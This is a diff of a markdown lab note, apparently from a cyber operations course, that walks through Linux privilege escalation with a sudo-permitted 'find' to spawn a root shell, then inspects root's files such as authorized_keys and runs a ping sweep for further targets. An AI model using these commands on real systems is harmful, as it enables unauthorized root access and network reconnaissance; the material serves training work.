mkirwa/CYBOLC/CCTC/Security/Operation_Dry_Run.md

     User Aaron may run the following commands on RoundSensor:
     (ALL) NOPASSWD: /usr/bin/find

+Step 0e.
+Find the SIDor the SGID file that looks out of place comrade@lin1:~$ `find / -type f -perm /6000 -ls 2>/dev/null`

 Step 2.
-Go to GTFO bins and find the vulnerability for find.
+Go to GTFO bins and find the vulnerability for find. -> https://gtfobins.github.io/

 Step 3.
 The following command run and changed the user to root `sudo find . -exec /bin/sh \; -quit`

 Step 4.
-You know have root privileges
+You know have root privileges -> Explore everything in the root directory

+Step 0f. `cd root`, try to cut and see everything in root `ls` and `ls -la .ssh/authorized_keys` and `cat ab.sh` -> what port is listening on this ssh??? and `ps -elf`and `cat run` and `cat /lib/libhandle.10`

+#### Find Additional Targets ####

 Step 5.
 Run `for i in {1..254} ;do (ping -c 1 192.168.28.$i | grep "bytes from" &) ;done` to see which ips are open and this gives